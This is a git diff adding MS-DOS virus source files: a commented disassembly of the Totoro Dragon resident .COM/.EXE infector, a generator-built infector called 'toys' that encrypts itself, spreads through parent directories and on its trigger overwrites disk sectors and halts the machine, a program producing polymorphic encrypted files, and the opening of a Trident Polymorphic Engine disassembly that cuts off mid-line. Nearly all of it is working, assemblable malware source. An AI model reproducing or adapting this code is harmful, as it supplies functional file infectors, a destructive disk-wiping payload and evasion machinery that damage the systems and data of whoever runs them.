b/MSDOS/Virus.MSDOS.Unknown.totoro.asm new file mode 100644 index 00000000..b3dc86ab --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.totoro.asm @@ -0,0 +1,713 @@ +;TOTORO DRAGON disassembly. Included, for your pleasure, in Crypt +;Newsletter 14. Profuse thanks to Stormbringer, wherever he is. + +;*************************************************************************** +;* The Totoro Dragon Virus from Taiwan * +;*************************************************************************** +;* This virus is a fairly simple resident .EXE/.COM infector. It goes * +;*resident by re-executing the infected file and using Int 21, function 31.* +;*When it infects a .COM, it puts itself at the beginning of the file and * +;*starts the host at an offset of 600h (700h in memory), giving the virus * +;*an effective length of 1536 bytes, plus an extra 4 bytes for its marker * +;*at the end ("YTIT"). It infects .EXE files using the "standard" method. * +;*While it does save file attributes, the time and date change when a file * +;*is infected. The virus activates on Saturdays. When active, it installs* +;*an Int 08 (Timer click) handler that counts to 0CCCh, then shoves the * +;*text off the screen and prints the following in the upper left-hand * +;*corner: * +;* * +;* ķ * +;* Totoro Dragon * +;* Hello! I am TOTORO CAT * +;* Written by Y.T.J.C.T * +;* in Ping Tung. TAIWAN * +;* Don't Worry,be Happy * +;* Ľ * +;* * +;*It then restarts the counter and does it again. Other that this effect, * +;*the virus seems relatively harmless. * +;* * +;* * +;* Disassembly by Stormbringer * +;*************************************************************************** +.model tiny +.radix 16 +.code + org 100h + +start: + jmp short COM_Entry_Point + nop +;*************************************************************************** +;* Data Tables * +;*************************************************************************** +File_Size_Off dw 5 +File_Size_Seg dw 0 +TSR_DAT dw 4262h +DS_Save dw 0F21h +ES_Save dw 0F21h +File_Attribs dw 20h +IP_Save dw 0 +CS_Save dw 0F99 +SP_Save dw 0 +SS_Save dw 0 +File_Type db 'C' + +Wasted_Space db 0, 0, 0 ;? + +;******************************************** +; EXE_Header ; +;******************************************** + EXE_Sig db 'MZ' + Last_Page_Len dw 14h + EXE_Size dw 5 + Rel_Tbl_Items dw 0 + Header_Size dw 20h + Minalloc dw 0 + Maxalloc dw 0ffff + Init_SS dw 1 + Init_SP dw 700h + Checksum dw 0 + Init_IP dw 91h + Init_CS dw 1 + First_Rel dw 001Eh + Overlay_Num dw 0 +;******************************************** + +CS_Store dw 0 +Command db 'COMMAND.COM', 0 + db 00h, 80h, 00h +ES_Store_1 dw 0F21h + dw 5Ch +ES_Store_2 dw 0F21h + dw 6Ch +ES_Store_3 dw 0F21h +File_Handle dw 5 + +Buffer_For_Checks db 0 + db 4Ch,0CDh, 21h + +File_Name_Off dw 469h +File_Name_Seg dw 0DF5h + db 0 +Mem_Seg dw 0F93h +IP_24 dw 156h +CS_24 dw 0DF5h + +;************************************************************************ +;* Virus Entry Point #1 (COM) * +;************************************************************************ +COM_Entry_Point: + mov ax,0F1F1h ;Is the virus in memory? + int 21h + mov cs:CS_Store,0 + mov cs:[ES_Save],es + cmp ax,0F1F1h ;AX preserved? + je Already_Installed ;Same? go Already_Installed + jmp Install_Virus ;Not In Mem? go Install_Virus + +Already_Installed: ;Restore control to host file (COM) + mov ax,cs + mov es,ax ;ES = DS = CS + mov ds,ax + mov ah,0CBh ;Restore Control + mov si,700h ;Offset of host in file + mov di,100h ;Original offset of host + mov cx,cs:[File_Size_Off] ;Size of host file + + int 21h ;Call internal routine to restore control + ;to host .COM file. + +;************************************************************************ +;* Virus Entry Point #2 (EXE) * +;************************************************************************ +EXE_Entry_Point: + mov ax,cs + sub ax,10h + push ax + mov ax,offset After_Jump + push ax + retf ;Jump to After_Jump with + ;original .COM offsets. +After_Jump: + mov cs:[ES_Save],es + mov cs:[DS_Save],ds + mov ax,0F1F1h + int 21h + cmp ax,0F1F1h ;Check if installed. + jne Get_New_Seg ;Nope, Install.... + + cli + mov ax,cs:[SS_Save] ;Yes, restore host regs + add ax,10h + mov bx,es + add ax,bx + mov ss,ax + mov sp,cs:[SP_Save] + sti + + mov ax,cs:[CS_Store] + mov bx,es + add ax,bx + add ax,10h + mov word ptr cs:[IP_Save+2],ax + jmp dword ptr cs:[IP_Save] ;Restore Control to + ;.EXE host. + +Get_New_Seg: + push es ;For later RETF + xor ax,ax + mov ds,ax ;DS = 0 + +;**************************************************************************** +;*NOTE: From 0:200 to 0:400 there is some "empty" space, as it is the upper * +;* (unused) part of the interrupt tables. This virus uses the top three* +;* bytes, i.e. the INT 99 entry, to run a repnz movsb command followed * +;* by a retf. This is to copy the virus to a new segment in memory and* +;* jump to it. * +;**************************************************************************** + + mov word ptr ds:[3fdh],0A4F3h ;repnz movsb + mov byte ptr ds:[3ffh],0CBh ;retf + + push cs + pop ds + + mov si,100h + mov di,si ;Copy virus to new segment + mov cx,600h ;and "RETF" to + mov ax,offset Install_Virus ;Install_Virus in new copy + push ax + db 0EAh,0FDh, 03h, 00h, 00h ;Jump far 0:3FDh + +Install_Virus: + cli ;Disable interrupts + push cs + pop ds + mov ah,2Ah + int 21h ;Get Day/Date + + cmp al,6 ;Is it Saturday? + jne Set_Int_21 ;Nope, don't activate, just + mov ax,3508h ;infect files. + int 21h ;Get Int 08 address + + mov word ptr cs:[IP_08],bx + mov word ptr cs:[CS_08],es + mov dx,offset Int_08 + mov ax,2508h + int 21h ;Set Int 08 + +Set_Int_21: + mov ax,3521h + int 21h ;Get Int 21 address + + mov word ptr cs:[IP_21],bx + mov word ptr cs:[CS_21],es + mov dx,offset Int_21 + mov ax,2521h + int 21h ;Set Int_21 + + mov es,cs:[ES_Save] + cmp cs:[TSR_DAT],426Bh ;Second Execute? + je Go_TSR ;Yep, go TSR + + mov bx,1000h ;Nope, set up for second exec. + mov ah,4Ah + int 21h ;Change Mem Allocation + ;to 64k. + + mov es,es:[2ch] ;Environment string + xor di,di + xor al,al + mov cx,7FFFh + +Find_Filename: ;Search Environment for + repne scasb ;filename of host. + cmp es:[di],al + loopnz Find_Filename + + add di,3 ;Skip drive designator + ;i.e. "C:\" in + ;"C:\Infected.EXE" + mov dx,di + + push es + pop ds ;DS:DX = host filename + push cs + pop es + + cli ;Clears Ints (so none can + ;disrupt second execution + ;of virus) + + mov ax,cs:[ES_Save] + mov cs:[ES_Store_1],ax + mov cs:[ES_Store_2],ax + mov cs:[ES_Store_3],ax + mov bx,144h + mov ax,4B00h ;Re-Execute the file + pushf + call dword ptr cs:[IP_21] ;Call Int 21 to Execute file. + +Go_TSR: + mov ah,31h + mov dx,71h + int 21h ;Terminate and Stay Resident. + +Int_21: + pushf ;Push flags + cmp ax,0F1F1h ;Is it an Install Check? + jne Is_It_Execute ;No, Go Is_It_Execute + mov ax,0F1F1h ;Yes, save value (unneccesary) + popf + iret ;Return to virus in program. + +Is_It_Execute: + cmp ax,4B00h ;Is it a Load & Execute call? + jne Restore_Host ;Nope, continue on. + call execute ;Infect the file if possible. + jmp short Go_Int_21 ;And go to old Int 21 handler. + nop +Restore_Host: + cmp ah,0CBh ;Is it a request to restore + jne Go_Int_21 ;control to host? + pop ax ax ;Pop flags + Old IP (not kept) + mov word ptr cs:[IP_Save],100h + pop ax + mov word ptr cs:[IP_Save+2],ax + rep movsb ;Restore Host to orig. Pos. + popf ;Completely remove old Int call + mov ax,0 + jmp dword ptr cs:[IP_Save] ;Jump to Host:100 +Go_Int_21: + popf ; Pop flags + + db 0ea ;Jump to Int 21 +IP_21 dw 040ebh +CS_21 dw 0011 + + +execute: + push es ds ax bx cx dx si di + mov cs:[File_Name_Seg],ds + mov cs:[File_Name_Off],dx + mov ax,3524h ;Get Int 24 Address + int 21h ;(Critical Error) + + mov cs:[IP_24],bx + mov cs:[CS_24],es + push cs + pop ds + mov dx,offset Int_24 + mov ax,2524h + int 21h ;Set Int 24 + + mov ds,cs:[File_Name_Seg] + mov si,cs:[File_Name_Off] + +Name_Check: + lodsb + or al,al ;Is the first byte a zero? + jnz Name_Check ;Nope, find end of string + mov al,[si-2] + and al,0DFh + cmp al,4Dh ;'M' + je Is_Com ;COM file, jump Is_Com + cmp al,45h ;'E' + je Is_EXE ;EXE file, jump Is_EXE + jmp Clean_Up ;Neither? Go Clean_Up +Is_Com: + mov cs:[File_Type],'C' ;Save File type for later. + jmp short Check_If_Command + nop +Is_EXE: + mov cs:[File_Type],'E' + +Check_If_Command: + sub si,0Ch + mov di,offset Command + push cs + pop es + mov cx,0Bh ;Is it Command.COM? + repe cmpsb + jnz Start_Infect ;No, Jump Start_Infect +Got_An_Error: + jmp Clean_Up ;Is Command, get otta here. + +Start_Infect: + mov ds,cs:[File_Name_Seg] + mov dx,cs:[File_Name_Off] + mov ax,4300h + int 21h ;Get Attribs + + jc Got_An_Error + mov cs:[File_Attribs],cx + xor cx,cx + mov ax,4301h + int 21h ;Zero Attrib's for read/write + + jc Got_An_Error + mov ax,3D02h + int 21h ;Open Read/Write + + jnc Check_Infect ;Everything Fine? go Check_Infect + jmp Reset_Attribs ;Couldn't Open, go Reset_Attribs + +Check_Infect: + mov bx,ax + mov cs:[File_Handle],ax + mov cx,0FFFFh + mov dx,0FFFCh + mov ax,4202h + int 21h ;Move to 4 bytes from end + + add ax,4 + mov cs:[File_Size_Off],ax + push cs + pop ds + mov dx,offset Buffer_For_Checks + mov cx,4 + mov ah,3Fh + int 21h + ;Read in Last 4 bytes of file + push cs + pop es + mov cx,4 + mov si,offset Marker ;are last 4 bytes 'YTIT'? + mov di,offset Buffer_For_Checks ; + repe cmpsb + jnz Check_Which_Type ;Not infected? Go Check_Which_Type + jmp Close_File ;Infected? Go Close_File + +Check_Which_Type: + cmp cs:[File_Type],'C' ;Is it a .COM? + je COM_Infect ;Yes, go COM_Infect + jmp EXE_Infect ;No, go EXE_Infect + +COM_Infect: + mov ah,48h + mov bx,1000h + int 21h ;Allocate 64k of memory + + jnc Load_In_File ;No Prob? Go Load_In_File + jmp Close_File ;Otherwise, go Close_File + +Load_In_File: + mov cs:[Mem_Seg],ax + mov bx,cs:[File_Handle] + xor cx,cx + xor dx,dx + mov ax,4200h + int 21h ;Go to beginning of file + + push cs + pop ds + mov es,cs:[Mem_Seg] + + mov si,100 + + mov di,si + mov cx,700h + rep movsb + mov ds,cs:Mem_Seg + mov cx,cs:[File_Size_Off] + mov dx,700h + mov ah,3Fh ;Load entire file to directly + int 21h ;after virus. + + xor cx,cx + xor dx,dx + mov ax,4200h + int 21h ;Move to the beginning of file + + mov dx,100h + mov cx,cs:[File_Size_Off] + add cx,600h + mov ah,40h + int 21h ;Write entire file back to disk + + jc Go_Release_Mem + xor cx,cx + xor dx,dx + mov ax,4202h + int 21h ;Move to end of file + + mov cs:[File_Size_Seg],0 ;COM < 64k + add ax,4 ;Add 4 for marker bytes + mov cs:[File_Size_Off],ax ;Save file size + push cs + pop ds + mov dx,offset Marker + mov cx,4 + mov ah,40h + int 21h ;Write in marker 'YTIT' + +Go_Release_Mem: + jmp Release_Mem + jmp Close_File + +EXE_Infect: + xor cx,cx + xor dx,dx + mov ax,4200h + int 21h ;Move to beginning of file + + push cs + pop ds + db 8dh,16h,1bh,01 ;lea dx,cs:[11Bh] + mov cx,1Ch + mov ah,3Fh + int 21h ;Read in .EXE header + +Save_Header_NFO: + cli ;clear ints + mov ax,cs:[Init_CS] + mov cs:[CS_Store],ax ;Save old CS + mov ax,cs:[Init_IP] + mov word ptr cs:[IP_Save],ax ;Save old IP + mov ax,cs:[Init_SS] + mov cs:[SS_Save],ax ;Save old SS + mov ax,cs:[Init_SP] + mov cs:[SP_Save],ax ;Save old SP + sti ;restore ints + + xor ax,ax + cmp cs:[Last_Page_Len],0 + je Calculate_Exe_Header + dec cs:[EXE_Size] + +Calculate_Exe_Header: ;Long, drawn out way + ;to calculate new EXE header + mov cx,200h + xor dx,dx + mov ax,cs:[EXE_Size] + mul cx + add ax,cs:[Last_Page_Len] + add ax,0Fh + adc dx,0 + and ax,0FFF0h + mov cs:[File_Size_Off],ax + mov cs:[File_Size_Seg],dx + push dx ax dx ax + xor dx,dx + mov ax,cs:[Header_Size] + mov cx,10h + mul cx + pop bx cx + sub bx,ax + sbb cx,dx + xchg ax,bx + xchg dx,cx + mov cx,10h + div cx + mov cs:[Init_CS],ax + mov cs:[Init_SS],ax + mov cs:[Init_SP],700h + mov cs:[Init_IP],offset EXE_Entry_Point-100 + pop ax dx + push dx ax + add ax,604h + adc dx,0 + mov cx,200h + div cx + mov cs:Last_Page_Len,dx + or dx,dx + jz Rewrite_Header + inc ax + +Rewrite_Header: + mov cs:[EXE_Size],ax + xor cx,cx + xor dx,dx + mov bx,cs:[File_Handle] + mov ax,4200h + int 21h ;Move back to beginning of file + + push cs + pop ds + mov dx,offset EXE_Sig + mov cx,1Ch + mov ah,40h + int 21h ;Write EXE header back to file + + pop dx + pop cx + jc Close_File + mov ax,4200h + int 21h ;Go to end of host. + + push cs + pop ds + mov dx,100 + mov cx,600h + mov ah,40h + int 21h ;Write Virus + jc Close_File + + xor cx,cx + xor dx,dx + mov ax,4202h + int 21h ;Go to end of file. + + mov dx,offset Marker + mov cx,4 + mov ah,40h + int 21h ;Write marker byte. + + jmp short Close_File + nop +Release_Mem: + mov es,cs:Mem_Seg + mov ah,49h + int 21h ;Release Memory + +Close_File: + mov ah,3Eh + mov bx,cs:[File_Handle] + int 21h ;Close file. + +Reset_Attribs: + mov ds,cs:File_Name_Seg + mov dx,cs:File_Name_Off + mov cx,cs:File_Attribs + mov ax,4301h + int 21h ;Reset File attributes + +Clean_Up: + mov ds,cs:[CS_24] ;Restore Critical Error + mov dx,cs:[IP_24] + mov ax,2524h + int 21h + + pop di si dx cx bx ax ds es + retn + + +Int_24: ;Critical Error Handler + xor ax,ax + iret + +Int_08: ;Timer Click Handler + pushf + inc cs:[Activation_Counter] + cmp cs:[Activation_Counter],0CCCh + jne Go_Int_08 + mov cs:[Activation_Counter],0 ;Reset Counter + push ds es si di ax bx cx dx + call Get_Mode + call Scroll_Area + call Print_Message + pop dx cx bx ax di si es ds +Go_Int_08: + popf ; Pop flags + db 0EA +IP_08 dw 003Ch +CS_08 dw 0D80h + +Screen_Width dw 0 +Activation_Counter dw 1E0h + +Get_Mode: + mov ah,0Fh + int 10h ;Get Video Mode + + mov bx,0B000h ;Mode 7 Text Video Memory + mov es,bx + cmp al,7 + je In_Mode_7 + mov bx,0B800h ;Regular Text Video Memory +In_Mode_7: + mov es,bx + mov ds,bx + mov cs:[Screen_Width],4Fh + +Setup_Screen: + mov cx,19h + mov bx,0 +Clear_Screen: + push cx + call Scroll_Line + add bx,0A0h + pop cx + loop Clear_Screen + + dec cs:[Screen_Width] + jnz Setup_Screen + retn + +Scroll_Line: ;This subroutine clears the + mov di,bx ;screen by scrolling the text + mov si,bx ;straight off of the left + add si,2 ;side. + mov cx,cs:[Screen_Width] + +Scroll_Sideways: + lodsb + stosb + inc si + inc di + loop Scroll_Sideways + retn + +Print_Message: + xor bx,bx + push cs + pop ds + db 8dh,36h,18h,06 ;lea si,cs:[Totoro_Design] + mov ah,0Eh +Print_Loop: + lodsb + int 10h ;Write Char in Teletype mode + cmp byte ptr [si],24h ;is it a '$'? + jne Print_Loop ;Nope, continue writing + retn + +Scroll_Area: + xor bx,bx ;Video Page 0 + mov ah,3 + int 10h ;Get Cursor info + + push dx ;Push Cursor Location (DX) + mov ah,6 + mov bh,7 + mov al,18h + xor cx,cx + mov dh,18h + mov dl,4Fh + int 10h ;Scroll up (clear screen) + + mov ah,2 + pop dx + sub dh,2 + xor bx,bx + int 10h ;Reset Cursor + + xor bx,bx + xor dx,dx + mov ah,2 + int 10h ;Set Cursor for printing. + retn + +Totoro_Design: + db ' ķ',0Dh, 0Ah + db ' Totoro Dragon ',0Dh, 0Ah + db ' Hello! I am TOTORO CAT',0Dh, 0Ah + db ' Written by Y.T.J.C.T ',0Dh, 0Ah + db ' in Ping Tung. TAIWAN ',0Dh, 0Ah + db ' Don''t Worry,be Happy ',0Dh, 0Ah + db ' Ľ$' +Marker db 'YTIT' + db 28 dup (0) + +;*************************************************************************** +;*End of virus. The bytes below this line are the infected program and the * +;* viruses' identification bytes. * +;*************************************************************************** + +Host_Program: + mov ax,4c00 + int 21 + +Infected_Mark db 'YTIT' +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.toys.asm b/MSDOS/Virus.MSDOS.Unknown.toys.asm new file mode 100644 index 00000000..cc1d0cc8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.toys.asm @@ -0,0 +1,381 @@ +; toys.asm : Unknown by Unknown +; Created wik the Phalcon/Skism Mass-Produced Code Generator +; from the configuration file skeleton.cfg + +.model tiny ; Handy directive +.code ; Virus code segment + org 100h ; COM file starting IP + +id = 'FZ' ; ID word for EXE infections +entry_point: db 0e9h,0,0 ; jmp decrypt + +decrypt: loop decrypt ; handles encryption and decryption +patch_startencrypt: + mov si,offset startencrypt ; start of decryption + mov dx,(offset heap - offset startencrypt)/2 ; iterations +decrypt_loop: + db 2eh,81h,34h ; xor word ptr cs:[si], xxxx +decrypt_value dw 0 ; initialised at zero for null effect + inc si ; calculate new decryption location + inc si + dec dx ; If we are not done, then + jnz decrypt_loop ; decrypt mo' +startencrypt: + call next ; calculate delta offset +next: pop bp ; bp = IP next + sub bp,offset next ; bp = delta offset + + cmp sp,id ; COM or EXE? + je restoreEXE +restoreCOM: + lea si,[bp+save3] + mov di,100h + push di ; For later return + movsb + jmp short restoreEXIT +restoreEXE: + push ds + push es + push cs ; DS = CS + pop ds + push cs ; ES = CS + pop es + lea si,[bp+jmpsave2] + lea di,[bp+jmpsave] + movsw + movsw + movsw +restoreEXIT: + movsw + + mov byte ptr [bp+numinfec],2 ; reset infection counter + + mov ah,1Ah ; Set new DTA + lea dx,[bp+newDTA] ; new DTA @ DS:DX + int 21h + + mov ah,47h ; Get current directory + mov dl,0 ; Current drive + lea si,[bp+origdir] ; DS:SI->buffer + int 21h + mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR + + mov ax,3524h ; Get int 24 handler + int 21h ; to ES:BX + mov word ptr [bp+oldint24],bx; Save it + mov word ptr [bp+oldint24+2],es + mov ah,25h ; Set new int 24 handler + lea dx,[bp+offset int24] ; DS:DX->new handler + int 21h + push cs ; Restore ES + pop es ; 'cuz it was changed + +dir_scan: ; "dot dot" traversal + lea dx,[bp+exe_mask] + call infect_mask + lea dx,[bp+com_mask] + call infect_mask + mov ah,3bh ; change directory + lea dx,[bp+dot_dot] ; "cd .." + int 21h + jnc dir_scan ; go back for mo! + +done_infections: + mov ah,2ah ; Get current date + int 21h + cmp dh,6 ; Check month + cmp dl,19 ; Check date + jb exit_virus + cmp al,-1 ; Check date of week + jz activate + + mov ah,2ch ; Get current time + int 21h + cmp ch,18 ; Check the hour + jnz exit_virus + cmp cl,-1 ; Check the minute + jnz exit_virus + cmp dh,-1 ; Check the seconds + jnz exit_virus +exit_virus: + mov ax,2524h ; Restore int 24 handler + lds dx,[bp+offset oldint24] ; to original + int 21h + push cs + pop ds + + mov ah,3bh ; change directory + lea dx,[bp+origdir-1] ; original directory + int 21h + + mov ah,1ah ; restore DTA to default + mov dx,80h ; DTA in PSP + cmp sp,id-4 ; EXE or COM? + jz returnEXE +returnCOM: + int 21h + retn ; 100h is on stack +returnEXE: + pop es + pop ds + int 21h + mov ax,es ; AX = PSP segment + add ax,10h ; Adjust for PSP + add word ptr cs:[bp+jmpsave+2],ax + add ax,word ptr cs:[bp+stacksave+2] + cli ; Clear intrpts for stack manipulation + mov sp,word ptr cs:[bp+stacksave] + mov ss,ax + sti + db 0eah ; jmp ssss:oooo +jmpsave dd ? ; Original CS:IP +stacksave dd ? ; Original SS:SP +jmpsave2 db ? ; Actually four bytes +save3 db 0cdh,20h,0 ; First 3 bytes of COM file +stacksave2 dd ? + +activate: mov si,offset data00 ; SI points to data + mov ah,0Eh ; BIOS display char. function +display_loop: lodsb ; Load the next char. into AL + or al,al ; Is the character a null? + je disp_strnend ; If it is, exit + int 010h ; BIOS video interrupt + jmp short display_loop ; Do the next character +disp_strnend: + + mov ax,0002h ; First argument is 2 + mov cx,00C8h ; Second argument is 200 + cli ; Disable interrupts (no Ctrl-C) + cwd ; Clear DX (start with sector 0) + int 026h ; DOS absolute write interrupt + sti ; Restore interrupts + + cli ; Clear the interrupt flag + hlt ; HaLT the computer + jmp short $ ; Just to make sure + + jmp exit_virus + +data00 db 10,13,"All my toys are broken",13,10 + db "And so am I inside.",13,10 + db "The carnival has closed",13,10 + db "Years ago...",13,10,0 + +;creator db '[MPC]',0 ; Mass Produced Code Generator + +infect_mask: + mov ah,4eh ; find first file + mov cx,7 ; any attribute +findfirstnext: + int 21h ; DS:DX points to mask + jc exit_infect_mask ; No mo files found + + mov al,0h ; Open read only + call open + + mov ah,3fh ; Read file to buffer + lea dx,[bp+buffer] ; @ DS:DX + mov cx,1Ah ; 1Ah bytes + int 21h + + mov ah,3eh ; Close file + int 21h + + cmp word ptr [bp+buffer],'ZM'; EXE? + jz checkEXE ; Why yes, yes it is! +checkCOM: + mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA + cmp ax,50000 ; Is it too large? + ja find_next + + mov bx,word ptr [bp+buffer+1]; get jmp location + add bx,heap-decrypt+3 ; Adjust for virus size + cmp ax,bx + je find_next ; already infected + jmp infect_com +checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected? + jnz infect_exe +find_next: + mov ah,4fh ; find next file + jmp short findfirstnext +exit_infect_mask: ret + +infect_exe: + les ax, dword ptr [bp+buffer+14h] ; Save old entry point + mov word ptr [bp+jmpsave2], ax + mov word ptr [bp+jmpsave2+2], es + + les ax, dword ptr [bp+buffer+0Eh] ; Save old stack + mov word ptr [bp+stacksave2], es + mov word ptr [bp+stacksave2+2], ax + + mov ax, word ptr [bp+buffer + 8] ; Get header size + mov cl, 4 ; convert to bytes + shl ax, cl + xchg ax, bx + + les ax, [bp+offset newDTA+26]; Get file size + mov dx, es ; to DX:AX + push ax + push dx + + sub ax, bx ; Subtract header size from + sbb dx, 0 ; file size + + mov cx, 10h ; Convert to segment:offset + div cx ; form + + mov word ptr [bp+buffer+14h], dx ; New entry point + mov word ptr [bp+buffer+16h], ax + + mov word ptr [bp+buffer+0Eh], ax ; and stack + mov word ptr [bp+buffer+10h], id + + pop dx ; get file length + pop ax + + add ax, heap-decrypt ; add virus size + adc dx, 0 + + mov cl, 9 + push ax + shr ax, cl + ror dx, cl + stc + adc dx, ax + pop ax + and ah, 1 ; mod 512 + + mov word ptr [bp+buffer+4], dx ; new file size + mov word ptr [bp+buffer+2], ax + + push cs ; restore ES + pop es + + push word ptr [bp+buffer+14h] ; needed later + mov cx, 1ah + jmp short finishinfection +infect_com: ; ax = filesize + mov cx,3 + sub ax,cx + lea si,[bp+offset buffer] + lea di,[bp+offset save3] + movsw + movsb + mov byte ptr [si-3],0e9h + mov word ptr [si-2],ax + add ax,103h + push ax ; needed later +finishinfection: + push cx ; Save # bytes to write + xor cx,cx ; Clear attributes + call attributes ; Set file attributes + + mov al,2 + call open + + mov ah,40h ; Write to file + lea dx,[bp+buffer] ; Write from buffer + pop cx ; cx bytes + int 21h + + mov ax,4202h ; Move file pointer + xor cx,cx ; to end of file + cwd ; xor dx,dx + int 21h + + mov ah,2ch ; Get current time + int 21h ; dh=sec,dl=1/100 sec + mov [bp+decrypt_value],dx ; Set new encryption value + lea di,[bp+code_store] + mov ax,5355h ; push bp,push bx + stosw + lea si,[bp+decrypt] ; Copy encryption function + mov cx,startencrypt-decrypt ; Bytes to move + push si ; Save for later use + push cx + rep movsb + + lea si,[bp+write] ; Copy writing function + mov cx,endwrite-write ; Bytes to move + rep movsb + pop cx + pop si + pop dx ; Entry point of virus + push di + push si + push cx + rep movsb ; Copy decryption function + mov ax,5b5dh ; pop bx,pop bp + stosw + mov al,0c3h ; retn + stosb + + add dx,offset startencrypt - offset decrypt ; Calculate new + mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of + call code_store ; decryption + pop cx + pop di + pop si + rep movsb ; Restore decryption function + + mov ax,5701h ; Restore creation date/time + mov cx,word ptr [bp+newDTA+16h] ; time + mov dx,word ptr [bp+newDTA+18h] ; date + int 21h + + mov ah,3eh ; Close file + int 21h + + mov ch,0 + mov cl,byte ptr [bp+newDTA+15h] ; Restore original + call attributes ; attributes + + dec byte ptr [bp+numinfec] ; One mo infection + jnz mo_infections ; Not enough + pop ax ; remove call from stack + jmp done_infections +mo_infections: jmp find_next + +open: + mov ah,3dh + lea dx,[bp+newDTA+30] ; filename in DTA + int 21h + xchg ax,bx + ret + +attributes: + mov ax,4301h ; Set attributes to cx + lea dx,[bp+newDTA+30] ; filename in DTA + int 21h + ret + +write: + pop bx ; Restore file handle + pop bp ; Restore relativeness + mov ah,40h ; Write to file + lea dx,[bp+decrypt] ; Concatenate virus + mov cx,heap-decrypt ; # bytes to write + int 21h + push bx + push bp +endwrite: + +int24: ; New int 24h (error) handler + mov al,3 ; Fail call + iret ; Return control + +exe_mask db '*.exe',0 +com_mask db '*.com',0 +dot_dot db '..',0 +heap: ; Variables not in code +; The following code is the buffer for the write function +code_store: db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?) +oldint24 dd ? ; Storage for old int 24h handler +backslash db ? +origdir db 64 dup (?) ; Current directory buffer +newDTA db 43 dup (?) ; Temporary DTA +numinfec db ? ; Infections this run +buffer db 1ah dup (?) ; read buffer +endheap: ; End of virus +end entry_point diff --git a/MSDOS/Virus.MSDOS.Unknown.tpe-gen.asm b/MSDOS/Virus.MSDOS.Unknown.tpe-gen.asm new file mode 100644 index 00000000..db5c4418 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tpe-gen.asm @@ -0,0 +1,101 @@ +;---------------------------------------------------------------------------- +; TPE-GEN - This program generates 50 TPE encrypted test files +; +; This source can be compiled with MASM 5.0 or TASM 2.01 +; (and perhaps others too, but this is not tested.) +;---------------------------------------------------------------------------- + + .model tiny + .RADIX 16 + + .code + + extrn crypt:near ;external routines in engine + extrn rnd_get:near + extrn rnd_init:near + + + org 0100 + +begin: call rnd_init ;init. random number generator + + mov dx,offset starttxt ;print message + mov ah,09 + int 21 + + mov cx,50d ;repeat 50 times +lop: push cx + + mov ah,3C ;create a new file + mov dx,offset filename + mov cx,0020 + int 21 + xchg ax,bx + + push ds + push es + push bx + + mov ax,cs ;input parameters for engine + mov ds,ax + add ax,0400 + mov es,ax ;ES = DS + 400h + xor si,si ;code will be right after decr. + mov dx,offset hello ;this will be encrtypted + mov cx,100d ;length of code to encrypt + mov bp,0100 ;decryptor will start at 100h + call rnd_get ;AX register will be random + + call crypt ;call the engine + + pop bx ;write crypted file + mov ah,40 + int 21 + + mov ah,3E ;close the file + int 21 + + pop es + pop ds + + mov di,offset filename ;adjust name for next file + mov bx,7 ; (increment number) +incnum: inc byte ptr ds:[bx+di] + cmp byte ptr ds:[bx+di],'9' + jbe numok + mov byte ptr ds:[bx+di],'0' + dec bx + jnz incnum + +numok: pop cx ;do it again... + loop lop + +exit: int 20 + + +;---------------------------------------------------------------------------- +; Text and data +;---------------------------------------------------------------------------- + +starttxt db 'TPE-GEN - Generates 50 TPE encrypted test files.' + db 0Dh, 0Ah, '$' + +filename db '00000000.COM',0 + + +;---------------------------------------------------------------------------- +; The small test file that will be encrypted +;---------------------------------------------------------------------------- + +hello: call next ;get relative offset +next: pop dx + add dx,10d ;find begin of message + mov ah,09 ;print message + int 21 + int 20 + + db 'Hello, world!', 0Dh, 0A, '$' + db (100d) dup (90) + + end begin + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tpe-v11.asm b/MSDOS/Virus.MSDOS.Unknown.tpe-v11.asm new file mode 100644 index 00000000..e6702ac6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tpe-v11.asm @@ -0,0 +1,1028 @@ +.radix 16 + +;============================================================================= +; = +; Trident Polymorphic Engine v1.1 = +; ------------------------------- = +; = +; Dissassembled by: Lucifer Messiah -- ANARKICK SYSTEMS = +; = +; This dissassembly uses as many of the labels from the = +; TPE v1.2 dissassembly as possible, to allow comparison = +; = +;----------------------------------------------------------------------------= +; = +; Trident Polymorphic Engine v1.1 = +; ------------------------------- = +; = +; Input: = +; ES Work Segment = +; DS:DX Code to be encrypted = +; BP Becomes offset of TPE = +; SI Distance to put between decryptor and code = +; CX Length of code to encrypt = +; AX Bit Field Flags: bit 0: DS will not be equal to CS = +; bit 1: insert random instructions = +; bit 2: put junk before decryptor = +; bit 3: Preserve AX with decryptor = +; = +; Output: = +; ES Work Segment (preserved) = +; DS:DX Decryptor + encrypted code = +; BP Start of decryptor (preserved) = +; DI Length of decryptor/offset of encrypted code = +; CX Length of decryptor + encrypted code = +; AX Length of encrypted code = +; = +;============================================================================= + + .model tiny + .code + org 0 + +public rnd_init +public rnd_get +public crypt +public tpe_top +public tpe_bottom + +tpe_top equ $ + db '[ MK / TridenT ]' ;encryptor name + +crypt: + xor di,di + call dword ptr ds:[5652h] ;???? + push cs ;save registers + pop ds + mov byte ptr flags,al + test al,8 + je no_push + mov al,50h + stosb + +no_push: + call rnd_get ;add a few bytes to cx + and ax,1fh + add cx,ax + push cx ;save length of code + call rnd_get ;get random flags + xchg ax,bx + +;--- Flags: ----------------------------------------------- +; +; 0,1 encryption method +; 2,3 which registers to use in encryption engine +; 4 use byte or word for encrypt +; 5 MOV AL, MOV AH, or MOV AX +; 6 MOV CL, MOV CH, or MOV CX +; 7 AX or DX +; 8 count up or down +; 9 ADD/SUB/INC/DEC or CMPSW/SCASW +; A ADD/SUB or INC/DEC +; CMPSW or SCASW +; B offset in XOR instrucion? +; C LOOPNZ or LOOP +; SUB CX or DEC CX +; D carry with crypt ADD/SUB +; E carry with inc ADD/SUB +; F XOR instruction value or AX/DX +; +;---------------------------------------------------------- + +random: + call rnd_get ;get encryption value + or al,al ;is it a 0? + je random ;redo it if it is + mov word 